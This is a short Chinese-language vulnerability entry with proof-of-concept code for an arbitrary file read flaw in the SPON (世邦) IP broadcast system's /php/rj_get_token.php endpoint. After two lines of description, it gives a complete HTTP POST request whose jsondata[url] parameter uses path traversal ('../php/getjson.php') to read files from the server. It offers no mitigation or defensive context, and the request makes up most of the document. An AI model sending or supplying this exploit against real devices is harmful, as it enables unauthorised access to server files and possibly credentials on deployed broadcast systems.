漏洞描述
世邦IP广播系统 /php/rj_get_token.php接口 存在任意文件读取
世邦IP广播系统 /php/rj_get_token.php 任意文件读取漏洞
PoC代码
POST /php/rj_get_token.php HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
jsondata[url]=../php/getjson.php